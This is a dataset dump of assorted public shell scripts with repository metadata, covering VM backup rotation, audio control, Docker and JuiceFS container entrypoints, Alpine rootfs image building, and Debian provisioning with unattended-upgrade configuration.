export FUTUREIO_NODE=${DD:$OFS}
else
DD=${config_base}$FUTUREIO_NODE
if [ ! \( -d $DD \) ]; then
echo no directory named $PWD/$DD
cd -
exit 1
fi
fi
bash $FUTUREIO_HOME/scripts/futureio-tn_down.sh
bash $FUTUREIO_HOME/scripts/futureio-tn_up.sh $*
| true
|
134477945d206077ee51fdbcb249df680e7db432
|
Shell
|
Nobatek/vmbackup
|
/vmbackuprotate
|
UTF-8
| 2,867
| 4.3125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#####################################
## Rotate virtual machines backups ##
#####################################
usage ()
{
echo ''
echo 'Usage : vmbackuprotate <config file path>'
echo ' config file path: path to configuration file'
echo ''
}
# If wrong number of arguments, print usage and exit
[ $# -ne 1 ] && { usage; exit 1; }
# Parameters
# ----------
# Default values
# Day of the week for weekly backup (1 is monday, 7 is sunday)
WEEKLY_DAY_OF_WEEK=7
# Keep daily backups for N days
DAILY_BACKUPS_LIFETIME=7
# Keep weekly backups for N weeks
WEEKLY_BACKUPS_LIFETIME=4
# Names of VM to backup
# (if not found in config file, no VM to backup)
VM_NAMES=""
# Remote directories to synchronize
# (if not found in config file, no remote dir to synchronize)
REMOTE_DIRS=""
# Source config file (overrides defaults)
source $1
## Check directories are defined (no default values for those)
if [[ -z $VM_DIR ]]; then { echo >&2 "Missing parameter VM_DIR in config file"; exit 3; }; fi
if [[ -z $BAK_DIR ]]; then { echo >&2 "Missing parameter BAK_DIR in config file"; exit 3; }; fi
# Script
# ------
# Create backup dirs if they don't exist
DAILY_DIR=$BAK_DIR/daily
WEEKLY_DIR=$BAK_DIR/weekly
mkdir -p $DAILY_DIR && mkdir -p $WEEKLY_DIR || { echo >&2 "Error creating backup directories. Aborting."; exit 4; }
# Make backups
for vm in $VM_NAMES
do
echo "Backup $vm..."
# Backup VM
BAK_FILENAME="$vm"_`date +%y%m%d`.qcow2
BAK_FILEPATH=$BAK_DIR/$BAK_FILENAME
vmbackup $VM_DIR $vm $BAK_FILEPATH || { echo >&2 "Backup failed for $vm "; continue; }
# Move backup to daily directory
mv $BAK_FILEPATH $DAILY_DIR
# If today is weekly backup, hard link to "weekly" directory
if [ `date +%u` -eq $WEEKLY_DAY_OF_WEEK ]
then
ln $DAILY_DIR/$BAK_FILENAME $WEEKLY_DIR
fi
done
# Get rid of old backups
# LIFETIME = 0 means "do not delete backups, keep them permanently"
# The script does not run every week at the exact same time of day, so we
# subtract 6 hours to deal with this approximation
if [ $DAILY_BACKUPS_LIFETIME -gt 0 ]; then
find $DAILY_DIR -mmin +$(( ($DAILY_BACKUPS_LIFETIME * 24 - 6 ) * 60 )) -delete
fi
if [ $WEEKLY_BACKUPS_LIFETIME -gt 0 ]; then
find $WEEKLY_DIR -mmin +$(( ($WEEKLY_BACKUPS_LIFETIME * 7 * 24 - 6 ) * 60 )) -delete
fi
# Synchronize remote directories
for remote in $REMOTE_DIRS
do
echo "Synchronize $remote..."
# A 'vmbackup' directory is created in each remote dir
# Hardcoding a subdirectory name is not elegant, but it is a simple measure to avoid wreaking havoc
# in the system if entering / as remote dir by mistake in the config file.
ionice -c2 -n7 nice -n19 rsync -a -H --delete --progress --sparse $BAK_DIR/ $remote/vmbackup || { echo >&2 "Synchronization failed for $remote"; continue; }
done
exit 0
| true
|
33732aa3387ff28003b79fceb65cc95f2fff7ccd
|
Shell
|
helderco/docker-php
|
/versions/7.2/init.d/xdebug.sh
|
UTF-8
| 214
| 3.203125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
# Enable/disable xdebug
if [ "$USE_XDEBUG" = "yes" ]; then
cp -n /usr/local/etc/php/xdebug.d/* /usr/local/etc/php/conf.d/
else
find /usr/local/etc/php/conf.d -name '*xdebug*' -delete
fi
| true
|
50d7535d6c2c6debbc4229434bfd1b46194111be
|
Shell
|
circuitfox/dotfiles
|
/bin/pulsectl
|
UTF-8
| 631
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/sh
PACIDX=$(pacmd list-sinks | grep -e '\* index:' | awk '{print $3}')
case $1 in
'u') pactl set-sink-volume $PACIDX +5% ;;
'U') pactl set-sink-volume $PACIDX +10% ;;
'd') pactl set-sink-volume $PACIDX -5% ;;
'D') pactl set-sink-volume $PACIDX -10% ;;
'm') pactl set-sink-mute $PACIDX toggle ;;
*)
echo 'USAGE: pulsectl.sh [cmd]'
echo ' u increase volume of current sink by 5%'
echo ' U increase volume of current sink by 10%'
echo ' d decrease volume of current sink by 5%'
echo ' D decrease volume of current sink by 10%'
;;
esac
exit 0
| true
|
b5907e3ee8a2029efc6043597ccb85b031ec0483
|
Shell
|
wendyi/continuousSecurityCsharp
|
/talisman.sh
|
UTF-8
| 182
| 2.53125
| 3
|
[] |
no_license
|
printf "refs/heads/master/ "
lastCommit="$(git rev-parse HEAD)"
printf $lastCommit
printf " refs/heads/master/ "
firstCommit="$(git rev-list HEAD | tail -n 1)"
printf $firstCommit
| true
|
cdb7e5b0428e3873962a8b7eef0d54acd51b20ec
|
Shell
|
dp28/dotfiles
|
/src/git/include_config.sh
|
UTF-8
| 363
| 3.234375
| 3
|
[
"MIT"
] |
permissive
|
#! /usr/bin/env bash
versioned_config=$DOTFILES_HOME/src/git/config
local_config=~/.gitconfig
if [ -f $local_config ] ; then
if ! grep $versioned_config $local_config 2>&1 > /dev/null ; then
echo "[include]" >> $local_config
echo " path = $versioned_config ;" >> $local_config
fi
else
cp $versioned_config $local_config
fi
unset versioned_config
| true
|
f31e08da37c156d96ce066551eb5bdfeb4865c4a
|
Shell
|
Suleman-Elahi/GOMP
|
/test/create_git_history.sh
|
UTF-8
| 551
| 2.59375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
function fakecommit {
touch $1.temp
git add .
git commit -m "Commit $1"
}
git init
git checkout -b main
git branch -D master
fakecommit 0
fakecommit 1
fakecommit 2
git checkout -b feature
fakecommit a
fakecommit b
git checkout main
fakecommit I
fakecommit II
fakecommit 3
git checkout feature
git cherry-pick main@{0}
fakecommit c
git checkout main
fakecommit III
fakecommit IV
fakecommit 4
git checkout feature
git cherry-pick main@{0}
fakecommit d
git checkout main
fakecommit V
fakecommit VI
mv .git test_history
rm *.temp
| true
|
52b6e2f06034c6789d4b5e792f9b12a185d7be82
|
Shell
|
Kaijun/dashboard
|
/build/run-gulp-in-docker.sh
|
UTF-8
| 1,389
| 3.515625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Copyright 2017 The Kubernetes Dashboard Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This is a script that runs gulp in a docker container,
# for machines that don't have nodejs, go and java installed.
DOCKER_RUN_OPTS=${DOCKER_RUN_OPTS:-}
DASHBOARD_IMAGE_NAME="kubernetes-dashboard-build-image"
DEFAULT_COMMAND=${DEFAULT_COMMAND:-"node_modules/.bin/gulp"}
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# Always test if the image is up-to-date. If nothing has changed since last build,
# it'll just use the already-built image
docker build -t ${DASHBOARD_IMAGE_NAME} -f ${DIR}/Dockerfile ${DIR}/../
# Run gulp in the container in interactive mode and expose necessary ports automatically
docker run \
-it \
--rm \
--net=host \
-v /var/run/docker.sock:/var/run/docker.sock \
${DOCKER_RUN_OPTS} \
${DASHBOARD_IMAGE_NAME} \
${DEFAULT_COMMAND} $@
| true
|
1147edcdb68cef6371ec0eba8755b1c007c06d66
|
Shell
|
Ken-Leo/MIPSfpga
|
/programs/linux_scripts/01_compile_c_to_assembly.sh
|
UTF-8
| 525
| 2.578125
| 3
|
[] |
no_license
|
## Compile C to ASM
## Usage: in sub-programs directory (eg. 00_counter) type "sh ../linux_scripts/01_compile_c_to_assembly.sh"
## @author Andrea Guerrieri - andrea.guerrieri@studenti.polito.it ing.guerrieri.a@gmail.com
## @file 01_compile_c_to_assembly.sh
#rem -EL - Little-endian
#rem -march=m14kc - MIPSfpga = MIPS microAptiv UP based on MIPS M14Kc
#rem -msoft-float - should not use floating-point processor instructions
#rem -O2 - optimization level
#rem -S - compile to assembly
mips-mti-elf-gcc -EL -march=m14kc -msoft-float -O2 -S main.c
| true
|
073538b8c1899b744e5bbdc5a5473eaa3ea645a5
|
Shell
|
ICTU/pipes
|
/entrypoint.sh
|
UTF-8
| 227
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/sh
while true ; do
if [ "$(ip link show | grep $IF_NAME | grep 'state UP')" != "" ] ; then break ; fi
sleep 2
done
ip a
dhcpcd -t 3600 -L -B -4 -e DNSREG_SOCKET=$DNSREG_SOCKET -e NET_PREFIX=$NET_PREFIX $IF_NAME
ip a
| true
|
6a7ff3089d3b8f49b64e61004a34dea2b0e5a171
|
Shell
|
gobbledygook88/eclib-data
|
/atkin/parallel/4/replace.sh
|
UTF-8
| 528
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
# Old file
OLD_FILE="tmanin_runtimes-serial-50000-60000.dat"
# New file
NEW_FILE="tmanin_runtimes-serial-high.dat"
# Get number of lines in new file
NUM_LINES=$(wc -l < $NEW_FILE)
# Loop over new file
for (( l=1; l<=$NUM_LINES; l++ ))
do
# Get value in first column of line l
KEY=$(awk "NR==${l} {print \$1}" $NEW_FILE)
# Get value in second column of line l
VAL=$(awk "NR==${l} {print \$2}" $NEW_FILE)
# Replace value in old file
sed -i -e "s/^${KEY} .*/${KEY} ${VAL}/" $OLD_FILE
done
| true
|
4b16698641e425af8792b41fca0b6d7a2cf67f84
|
Shell
|
lordgloom/linux_desktop_config
|
/scripts/dmenu_run_r
|
UTF-8
| 311
| 3.0625
| 3
|
[] |
no_license
|
#!/bin/sh
# a special version of dmenu_run that remembers the most-recently used items
# and shows them first when the menu first pops up
RECENT_FILE="${1:-$HOME/.dmenu.recent}"
{
[[ -s "$RECENT_FILE" ]] && cat "$RECENT_FILE"
dmenu_path
} \
| dmenu "$@" \
| dmenu_recent \
| ${SHELL:-"/bin/sh"} &
| true
|
64dc187b462e387e02ead8c3a59dde3b824a38b6
|
Shell
|
terminusdb-labs/terminusdb-scripts
|
/push_docker_terminusdb.sh
|
UTF-8
| 322
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
BRANCH=$1
TERMINUSDB_FOLDER="${BRANCH}_${RANDOM}"
git clone https://github.com/terminusdb/terminusdb.git --branch $BRANCH --single-branch "$TERMINUSDB_FOLDER"
cd "$TERMINUSDB_FOLDER"
sudo docker buildx build . -t "terminusdb/terminusdb-server:$BRANCH"
sudo docker push "terminusdb/terminusdb-server:$BRANCH"
| true
|
8433c97180fa62f0154486fdfec3fb7d70608073
|
Shell
|
baharxy/_pi_scripts
|
/wifiScan/setManaged
|
UTF-8
| 586
| 2.78125
| 3
|
[] |
no_license
|
#!/bin/bash
sudo ifconfig mon0 down
sudo iw dev mon0 del
sudo iw phy phy0 interface add wlan0 type managed
sudo ifdown wlan0
sudo ifup wlan0
iw dev
metric=$(sudo ip route show | grep default | grep metric)
first_elem= $($metric | awk '{print$1}')
if [ -n $first_elem ]; then
x=$(sudo ip route show | grep default| grep metric)
sudo ip route del $x
fi
sleep 1
WIFI_IP_ADDR_MASK=$(ip -4 addr show dev wlan0 | grep inet | awk '{print $2}')
staticip=$(echo $WIFI_IP_ADDR_MASK | awk -F'/' '{print $1}')
echo "My IP address is going to be: $staticip" | mail -s RPI_IP baharp@mit.edu
| true
|
b939220126ecce15ddbe8a4bbafa0a80189a0687
|
Shell
|
ekanai/timetree-todays-events-to-slack
|
/terraform/around_terraform.sh
|
UTF-8
| 523
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
directories=$(find . -name "resources.*" -maxdepth 2 -type d)
if [ 0 = ${#directories[@]} ]; then
echo "target is nothing"
exit 0
fi
for directory in $directories
do
prefix=$(echo $directory | sed -e "s%/%%")
prefix=$(echo $prefix | sed -e "s%.%%")
prefix=$(echo $prefix | sed -e "s%/%_%g")
for file in $(ls -F $directory | grep -v /)
do
if [ "before" = $1 ]; then
ln -s $directory/$file $prefix.$file
fi
if [ "after" = $1 ]; then
unlink $prefix.$file
fi
done
done
| true
|
a3457cbd97d56d1994dec8c9a054f61d49a170e4
|
Shell
|
jheredianet/dockerfiles
|
/juicefs/entrypoint.sh
|
UTF-8
| 1,346
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
# Abort entire script if any command fails
# S3QL_EXPORTER_ID=""
function disconnect() {
echo "unmounting $MOUNTPOINT"
juicefs umount --force "$MOUNTPOINT"
echo "Stop Success!!"
}
# Cache Size
export CACHE_SIZE=$((${CACHE_SIZE}*1024*1024))
# Log Files
mkdir -p "$CACHE_PATH"
export REDIS_LOGFILE="$CACHE_PATH/redis.log"
export RCLONE_LOGFILE="$CACHE_PATH/rclone.log"
export JUICE_LOGFILE="$CACHE_PATH/juiceFS.log"
# Update log files
touch $REDIS_LOGFILE
touch $RCLONE_LOGFILE
touch $JUICE_LOGFILE
# Create a temporary mountpoint and mount file system
mkdir -p "$MOUNTPOINT"
echo "mount juiceFS to $MOUNTPOINT"
# Enable Redis
if [ -f "/config/redis.conf" ]; then
sysctl vm.overcommit_memory=1
redis-server /config/redis.conf --logfile $REDIS_LOGFILE &
sleep 5
fi
# Enable Webdav
if [[ -n "$MOUNTCONFIG" ]]
then
rclone serve webdav \
--config $CONFIG \
--addr localhost:8080 \
--log-file="$RCLONE_LOGFILE" \
$RCLONE_OPTIONS \
$MOUNTCONFIG:$MOUNTPATH &
sleep 5
fi
juicefs mount -d -o allow_other \
$JUICEFS_OPTIONS --log $JUICE_LOGFILE \
--cache-dir $CACHE_PATH \
--cache-size $CACHE_SIZE \
$META_DATA $MOUNTPOINT
trap disconnect SIGINT
trap disconnect SIGTERM
tail -f "$REDIS_LOGFILE" "$RCLONE_LOGFILE" "$JUICE_LOGFILE" & wait
| true
|
5f0a790457f3089e9a2a294fcdcc495d64fe1de9
|
Shell
|
skwee357/dotfiles
|
/.config/tmux/scripts/tmux-kill-session
|
UTF-8
| 388
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
IS_RUNNING=$(pgrep tmux)
if [[ -z $TMUX ]] && [[ -z $IS_RUNNING ]]; then
exit 0
fi
SESSION_TO_KILL="$(tmux list-sessions | sed -n '/(attached)/s/:.*//p')"
SESSION_TO_SWITCH="$(tmux list-sessions | sed -n '/(attached)/!s/:.*//p' | head -n 1)"
if [[ ! -z $SESSION_TO_SWITCH ]]; then
tmux switch-client -t $SESSION_TO_SWITCH
fi
tmux kill-session -t $SESSION_TO_KILL
| true
|
588fe561d92c5fdbf01668e7c4268fd308fba9d7
|
Shell
|
vrijeshpatel1997/CST-221
|
/var2.sh
|
UTF-8
| 357
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/sh
# create a variable and export it for this shell as well as all other processes
MYVAR="This is a test"
export MYVAR;
echo "####################### "
echo "########################### var1.sh ############# "
echo "####################### "
printenv
# call another script
exec ./var2.sh # run in same process and wait for it to complete
exit 0
| true
|
e87214fe014edf3c11ad7b535a6b49e7d8e8357e
|
Shell
|
riszkymf/cron_telegram
|
/entrypoint.sh
|
UTF-8
| 1,243
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
set -f
CRONJOBS_FILE='crontab/cron'
not_null_re='^(\*\/[0-9])|([0-9])+$'
if [[ ! "$CRONJOB_COMMAND" ]]
then
echo -e "\e[31mERROR : CRONJOB_COMMAND does not exist!\e[0m"
exit
fi
if [[ "$CRON_MONTH" =~ $not_null_re ]] && [[ ! "$CRON_DoM" =~ $not_null_re ]] && [[ ! "$CRON_DoW" =~ $not_null_re ]]
then
CRON_DoM="1"
CRON_DoW="*"
DAY=true
fi
if [[ "$CRON_DoM" =~ $not_null_re ]] || [[ "$CRON_DoW" =~ $not_null_re ]]
then
DAY=true
fi
if [[ ! "$CRON_HOUR" =~ $not_null_re ]]
then
echo "SAY"
if [[ $DAY = true ]]
then
CRON_HOUR=0
HOUR=true
fi
else
HOUR=true
fi
if [[ ! "$CRON_MIN" =~ $not_null_re ]] && [[ $HOUR = true ]]
then
CRON_MIN=0
fi
declare -a ARR=( ${CRON_MIN:-'*'} ${CRON_HOUR:-'*'} ${CRON_DoM:-'*'} ${CRON_MONTH:-'*'} ${CRON_DoW:-'*'} )
echo -e "\e[92mCRON SCHEDULE :" ${ARR[*]}
echo -e "------------------------------------------------------------------------------------------------------\e[0m"
# PUT YOUR CRONJOB HERE
cat >> /var/spool/cron/crontabs << EOF
${ARR[*]} $CRONJOB_COMMAND
EOF
echo "Listing Crontab"
echo "------------------------------------------------------------------------------------------------------"
ls crontab
crond -f -L /dev/stdout
| true
|
0925804bf55d0260bf18cbc3f9fcef0e29df7755
|
Shell
|
athoik/GreekStreamTV
|
/plugin/update.sh
|
UTF-8
| 214
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/sh
URL="http://sgcpm.com/livestream/stream.xml"
if wget -q -O /tmp/stream.xml $URL
then
mv /tmp/stream.xml $1
echo "stations updated successfully"
else
echo "error downloading stations"
fi
echo
| true
|
7d5b2bbe78e3273d629a83581b65cba316578798
|
Shell
|
gavinblair/weather
|
/setup.sh
|
UTF-8
| 2,641
| 2.53125
| 3
|
[
"MIT"
] |
permissive
|
npm install grunt --save-dev;
npm install grunt-contrib-watch --save-dev;
npm install grunt-contrib-uglify --save-dev;
npm install grunt-contrib-jshint --save-dev;
npm install grunt-contrib-qunit --save-dev;
npm install qunitjs --save-dev;
mkdir --parents js/test;
mkdir --parents js/lib;
mkdir --parents js/prod;
cp node_modules/qunitjs/qunit/qunit.js js/test/qunit.js;
cp node_modules/qunitjs/qunit/qunit.css js/test/qunit.css;
cat <<EOF>js/test/test.html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>QUnit Example</title>
<link rel="stylesheet" href="qunit.css">
</head>
<body>
<div id="qunit"></div>
<div id="qunit-fixture"></div>
<script src="qunit.js"></script>
<script src="tests.js"></script>
</body>
</html>
EOF
cat <<EOF>js/test/tests.js
QUnit.test( "hello test", function() {
ok( 1 == "1", "QUnit is working!" );
});
EOF
npm init;
cat <<EOF>Gruntfile.js
module.exports = function(grunt){
grunt.initConfig({
pkg: grunt.file.readJSON('package.json'),
uglify: {
options: {
banner: '/*! <%= pkg.name %> <%= grunt.template.today() %> */\n'
},
build: {
src: ['js/lib/*.js', 'js/*.js'],
dest: 'js/prod/script.min.js'
}
},
jshint: {
files: 'js/*.js',
options: {
// Define globals exposed by modern browsers.
"browser": true,
// Define globals exposed by jQuery.
"jquery": true,
// Define globals exposed by Node.js.
"node": true,
// Force all variable names to use either camelCase style or UPPER_CASE
// with underscores.
"camelcase": false,
// Prohibit use of == and != in favor of === and !==.
"eqeqeq": false,
// Suppress warnings about == null comparisons.
"eqnull": true,
// Prohibit use of a variable before it is defined.
"latedef": true,
// Require capitalized names for constructor functions.
"newcap": true,
// Enforce use of single quotation marks for strings.
"quotmark": "single",
// Prohibit trailing whitespace.
"trailing": true,
// Prohibit use of explicitly undeclared variables.
"undef": true,
// Warn when variables are defined but never used.
"unused": true,
"force": true
}
},
qunit: {
all: ['js/test/test.html']
},
watch: {
files: ['js/lib/*.js', 'js/*.js', 'js/test/tests.js'],
tasks: ['jshint','uglify:build', 'qunit']
}
});
grunt.loadNpmTasks('grunt-contrib-watch');
grunt.loadNpmTasks('grunt-contrib-uglify');
grunt.loadNpmTasks('grunt-contrib-jshint');
grunt.loadNpmTasks('grunt-contrib-qunit');
grunt.registerTask('default', ['watch']);
};
EOF
echo "You may now use grunt!"
| true
|
98c58e752f1170f6dc2fbefa09f1da733d8b0ac2
|
Shell
|
Palkovsky/ps
|
/l7/z56/mk_rootfs.sh
|
UTF-8
| 1,398
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/bash
IMG_SIZE=512M
BEFORE_CMD=""
CHROOT_CMD=""
AFTER_CMD=""
POSITIONAL=()
while [[ $# -gt 0 ]]
do
key="$1"
case $key in
--before)
BEFORE_CMD=$2
shift ; shift
;;
--chroot)
CHROOT_CMD=$2
shift ; shift
;;
--after)
AFTER_CMD=$2
shift ; shift
;;
*)
POSITIONAL+=($1)
shift
;;
esac
done
set -- ${POSITIONAL[@]}
# Download and unpack Alpine Linux
wget -O rootfs.tar.gz http://dl-cdn.alpinelinux.org/alpine/v3.12/releases/x86_64/alpine-minirootfs-3.12.0-x86_64.tar.gz
mkdir rootfs/ && tar -C rootfs/ -xvf rootfs.tar.gz
# Create image file, mount it as a loopback device, format as ext4, copy rootfs.
rm rootfs.img ; fallocate -l $IMG_SIZE rootfs.img
losetup -fP rootfs.img
echo 'y' | mkfs.ext4 rootfs.img
umount /mnt ; mount -o loop rootfs.img /mnt
cp -r rootfs/* /mnt/
[ "$BEFORE_CMD" ] && /bin/bash -c "$BEFORE_CMD"
# Run stuff inside chroot
chroot /mnt /bin/sh <<EOF
export PATH=$PATH:/bin/
echo "::sysinit:/bin/mount -t proc none /proc" >> /etc/inittab
echo "::sysinit:/bin/mount -t sysfs none /sys" >> /etc/inittab
[ "$CHROOT_CMD" ] && /bin/ash -c "$CHROOT_CMD"
EOF
[ "$AFTER_CMD" ] && /bin/bash -c "$AFTER_CMD"
# Umount and cleanup.
umount /mnt
rm -rf rootfs rootfs.tar.gz
chmod 666 rootfs.img
| true
|
efea4457e47a20e28a94cd2b866cc000c5e45f48
|
Shell
|
gonzo-soc/rollUpIt.lnx
|
/libs/lnx_debian09/sm.sh
|
UTF-8
| 9,564
| 3.125
| 3
|
[] |
no_license
|
#! /bin/bash
doUpdate_SM_RUI() {
local -r debug_prefix="debug: [$0] [ $FUNCNAME ] : "
printf "$debug_prefix ${GRN_ROLLUP_IT} ENTER ${END_ROLLUP_IT} \n"
apt-get -y update
# need to avoid grub-pc dialog: see https://github.com/hashicorp/vagrant/issues/289
echo "grub-pc grub-pc/install_devices_disks_changed multiselect /dev/sda" | debconf-set-selections
echo "grub-pc grub-pc/install_devices multiselect /dev/sda1" | debconf-set-selections
apt-get -y full-upgrade
local -r pre_pkgs=(
"bc" "debconf-utils" "unattended-upgrades" "apt-listchanges"
)
installPkgList_COMMON_RUI pre_pkgs ""
onFailed_SM_RUI $? "Failed apt-get preparation"
printf "$debug_prefix ${GRN_ROLLUP_IT} EXIT ${END_ROLLUP_IT} \n"
}
doInstallCustoms_SM_RUI() {
local -r debug_prefix="debug: [$0] [ $FUNCNAME ] : "
printf "$debug_prefix ${GRN_ROLLUP_IT} ENTER ${END_ROLLUP_IT} \n"
local -r pkg_list=(
"python-dev" "build-essential"
"zlib1g-dev" "libncurses5-dev" "libgdbm-dev" "libnss3-dev" "openssl"
"libssl-dev" "libreadline-dev" "libffi-dev" "ntpdate" "ruby-dev"
"libbz2-dev" "libsqlite3-dev" "dbus" "llvm" "libncursesw5-dev"
"xz-utils" "tk-dev" "liblzma-dev" "python-openssl" "dnsutils"
"locales"
)
runInBackground_COMMON_RUI "installPkgList_COMMON_RUI pkg_list \"\""
local deps_list=''
local cmd_list=''
if [ -n "$(isUbuntu_SM_RUI)" ]; then
deps_list=(
"install_golang_INSTALL_RUI"
)
cmd_list=(
"install_grc_INSTALL_RUI"
"install_rcm_INSTALL_RUI"
)
else
deps_list=(
"install_python3_7_INSTALL_RUI" "install_golang_INSTALL_RUI"
)
cmd_list=(
"install_tmux_INSTALL_RUI"
"install_vim8_INSTALL_RUI"
"install_grc_INSTALL_RUI"
"install_rcm_INSTALL_RUI"
)
fi
runCmdListInBackground_COMMON_RUI deps_list
runCmdListInBackground_COMMON_RUI cmd_list
printf "$debug_prefix ${GRN_ROLLUP_IT} EXIT ${END_ROLLUP_IT} \n"
}
doGetLocaleStr() {
echo -n "ru_RU.UTF-8 UTF-8"
}
#:
#: Set system locale
#: arg0 - locale string
#:
doSetLocale_SM_RUI() {
local -r debug_prefix="debug: [$0] [ $FUNCNAME ] : "
printf "$debug_prefix ${GRN_ROLLUP_IT} ENTER ${END_ROLLUP_IT} \n"
local -r locale_str="$1"
sed -E -i "s/^#(\s+${locale_str}.*)$/\1/" "/etc/locale.gen"
locale-gen
onFailed_SM_RUI $? "Failed <locale-gen> command"
printf "$debug_prefix ${GRN_ROLLUP_IT} EXIT ${END_ROLLUP_IT} \n"
}
doRunSkeletonUserHome_SM_RUI() {
local -r debug_prefix="debug: [$0] [ $FUNCNAME ] : "
printf "$debug_prefix ${GRN_ROLLUP_IT} ENTER ${END_ROLLUP_IT} \n"
# see https://unix.stackexchange.com/questions/269078/executing-a-bash-script-function-with-sudo
# __FUNC=$(declare -f skeletonUserHome; declare -f onErrors_SM_RUI)
__FUNC_SKEL=$(declare -f skeletonUserHome_SM_RUI)
__FUNC_ONERRS=$(declare -f onErrors_SM_RUI)
__FUNC_INS_SHFMT=$(declare -f install_vim_shfmt_INSTALL_RUI)
sudo -u "$1" bash -c ". $ROOT_DIR_ROLL_UP_IT/libs/addColors.sh;
. $ROOT_DIR_ROLL_UP_IT/libs/addRegExps.sh;
. $ROOT_DIR_ROLL_UP_IT/libs/install/install.sh;
. $ROOT_DIR_ROLL_UP_IT/libs/commons.sh;
. $ROOT_DIR_ROLL_UP_IT/libs/sm.sh;
. $ROOT_DIR_ROLL_UP_IT/libs/lnx_debian09/commons.sh;
. $ROOT_DIR_ROLL_UP_IT/libs/lnx_debian09/sm.sh;
$__FUNC_SKEL; $__FUNC_ONERRS; $__FUNC_INS_SHFMT;
skeletonUserHome_SM_RUI $1"
printf "$debug_prefix ${GRN_ROLLUP_IT} EXIT ${END_ROLLUP_IT} \n"
}
doSetupUnattendedUpdates() {
local -r debug_prefix="debug: [$0] [ $FUNCNAME ] : "
printf "$debug_prefix ${GRN_ROLLUP_IT} ENTER ${END_ROLLUP_IT} \n"
local -r uupgrades_fp="/etc/apt/apt.conf.d/50unattended-upgrades"
local -r uauto_upgrades_fp="/etc/apt/apt.conf.d/20auto-upgrades"
local -r admin_email="gonzo.soc@gmail.com"
set +o nounset
if [ -f "${uupgrades_fp}" ]; then
cp "${uupgrades_fp}" "${uupgrades_fp}.orig"
cat <<'EOFF' >${uupgrades_fp}
// Unattended-Upgrade::Origins-Pattern controls which packages are
// upgraded.
//
// Lines below have the format format is "keyword=value,...". A
// package will be upgraded only if the values in its metadata match
// all the supplied keywords in a line. (In other words, omitted
// keywords are wild cards.) The keywords originate from the Release
// file, but several aliases are accepted. The accepted keywords are:
// a,archive,suite (eg, "stable")
// c,component (eg, "main", "contrib", "non-free")
// l,label (eg, "Debian", "Debian-Security")
// o,origin (eg, "Debian", "Unofficial Multimedia Packages")
// n,codename (eg, "jessie", "jessie-updates")
// site (eg, "http.debian.net")
// The available values on the system are printed by the command
// "apt-cache policy", and can be debugged by running
// "unattended-upgrades -d" and looking at the log file.
//
// Within lines unattended-upgrades allows 2 macros whose values are
// derived from /etc/debian_version:
// ${distro_id} Installed origin.
// ${distro_codename} Installed codename (eg, "jessie")
Unattended-Upgrade::Origins-Pattern {
// Codename based matching:
// This will follow the migration of a release through different
// archives (e.g. from testing to stable and later oldstable).
// "o=Debian,n=jessie";
// "o=Debian,n=jessie-updates";
// "o=Debian,n=jessie-proposed-updates";
// "o=Debian,n=jessie,l=Debian-Security";
// Archive or Suite based matching:
// Note that this will silently match a different release after
// migration to the specified archive (e.g. testing becomes the
// new stable).
"o=Debian,a=stable";
"o=Debian,a=stable-updates";
//"o=Debian,a=proposed-updates";
"origin=Debian,codename=${distro_codename},label=Debian-Security";
};
// List of packages to not update (regexp are supported)
Unattended-Upgrade::Package-Blacklist {
// "vim";
// "libc6";
// "libc6-dev";
// "libc6-i686";
};
// This option allows you to control if on a unclean dpkg exit
// unattended-upgrades will automatically run
// dpkg --force-confold --configure -a
// The default is true, to ensure updates keep getting installed
//Unattended-Upgrade::AutoFixInterruptedDpkg "false";
// Split the upgrade into the smallest possible chunks so that
// they can be interrupted with SIGUSR1. This makes the upgrade
// a bit slower but it has the benefit that shutdown while a upgrade
// is running is possible (with a small delay)
//Unattended-Upgrade::MinimalSteps "true";
// Install all unattended-upgrades when the machine is shuting down
// instead of doing it in the background while the machine is running
// This will (obviously) make shutdown slower
//Unattended-Upgrade::InstallOnShutdown "true";
// Send email to this address for problems or packages upgrades
// If empty or unset then no email is sent, make sure that you
// have a working mail setup on your system. A package that provides
// 'mailx' must be installed. E.g. "user@example.com"
Unattended-Upgrade::Mail "${admin_email}";
// Set this value to "true" to get emails only on errors. Default
// is to always send a mail if Unattended-Upgrade::Mail is set
//Unattended-Upgrade::MailOnlyOnError "true";
// Do automatic removal of new unused dependencies after the upgrade
// (equivalent to apt-get autoremove)
//Unattended-Upgrade::Remove-Unused-Dependencies "false";
// Automatically reboot *WITHOUT CONFIRMATION* if
// the file /var/run/reboot-required is found after the upgrade
//Unattended-Upgrade::Automatic-Reboot "false";
// Automatically reboot even if there are users currently logged in.
//Unattended-Upgrade::Automatic-Reboot-WithUsers "true";
// If automatic reboot is enabled and needed, reboot at the specific
// time instead of immediately
// Default: "now"
//Unattended-Upgrade::Automatic-Reboot-Time "02:00";
// Use apt bandwidth limit feature, this example limits the download
// speed to 70kb/sec
//Acquire::http::Dl-Limit "70";
// Enable logging to syslog. Default is False
// Unattended-Upgrade::SyslogEnable "false";
// Specify syslog facility. Default is daemon
// Unattended-Upgrade::SyslogFacility "daemon";
EOFF
else
